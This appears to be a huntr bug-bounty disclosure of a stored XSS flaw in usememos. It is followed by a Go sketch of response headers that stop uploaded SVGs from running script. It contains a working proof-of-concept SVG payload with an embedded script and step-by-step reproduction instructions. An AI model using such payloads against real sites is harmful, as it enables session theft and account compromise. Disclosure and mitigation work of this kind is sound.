huntr / Mike993 / 7E1BE91D-3B13-4300-8AF2-9BD9665EC335
Dec 20, 2022 - 8:15 a.m.

Stored XSS via SVG File

2022-12-20 08:15:50
mike993
www.huntr.dev
20
stored xss
svg file
usememos
crafted file
direct link

EPSS: 0.001 (Low), percentile 20.3%

Description

usememos has a feature to upload a file and display it. By uploading a crafted SVG file, users can perform a stored XSS attack through the image's direct link.

Copy the following code and save as filename.svg.

Proof of Concept (filename.svg)

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

  1. Log in as a user.
  2. Create a new post and upload the SVG file.
  3. Save the post.
  4. Take the direct link of the image and open it in a new tab.
  5. See the XSS (example link: https://<yoursite>/o/r/8/filename.svg).

If you need more specific information, feel free to contact me.
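A mitigation sketch for the direct-link behaviour reported above, added here as an example and not taken from the usememos code base: the upload handler sets response headers so that an SVG opened as a top-level document cannot run script in the application's origin. It assumes uploads are served from a Go net/http handler; `serveUpload`, `directLinkHeaders` and `uploadTypes` are hypothetical names.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"path/filepath"
	"strings"
)

// Types served for uploads; anything not listed becomes application/octet-stream.
var uploadTypes = map[string]string{
	".png": "image/png", ".jpg": "image/jpeg", ".jpeg": "image/jpeg",
	".gif": "image/gif", ".webp": "image/webp", ".svg": "image/svg+xml",
}

// serveUpload writes a user-uploaded file so that opening its direct link
// cannot run script in the application's origin (hypothetical helper).
func serveUpload(w http.ResponseWriter, name string, data []byte) {
	ctype, ok := uploadTypes[strings.ToLower(filepath.Ext(name))]
	if !ok {
		ctype = "application/octet-stream"
	}
	h := w.Header()
	h.Set("Content-Type", ctype)
	h.Set("X-Content-Type-Options", "nosniff") // the declared type is final
	// If the file is loaded as a document: no script, sandboxed unique origin.
	h.Set("Content-Security-Policy", "default-src 'none'; style-src 'unsafe-inline'; sandbox")
	if !ok || ctype == "image/svg+xml" {
		// Download instead of rendering; <img> embedding is unaffected.
		h.Set("Content-Disposition", "attachment")
	}
	w.Write(data)
}

// directLinkHeaders simulates a GET on the direct link and returns its headers.
func directLinkHeaders(name string, data []byte) http.Header {
	rec := httptest.NewRecorder()
	serveUpload(rec, name, data)
	return rec.Result().Header
}

func main() {
	// Constructed sample: a minimal SVG with a script element, like the PoC above.
	svg := []byte(`<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.location)</script></svg>`)
	for k, v := range directLinkHeaders("filename.svg", svg) {
		fmt.Println(k+":", v[0])
	}
}
```

The SVG keeps its `image/svg+xml` type so it still renders inside `<img>`, where browsers do not execute embedded script; only direct navigation is turned into a download with a sandboxed policy.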
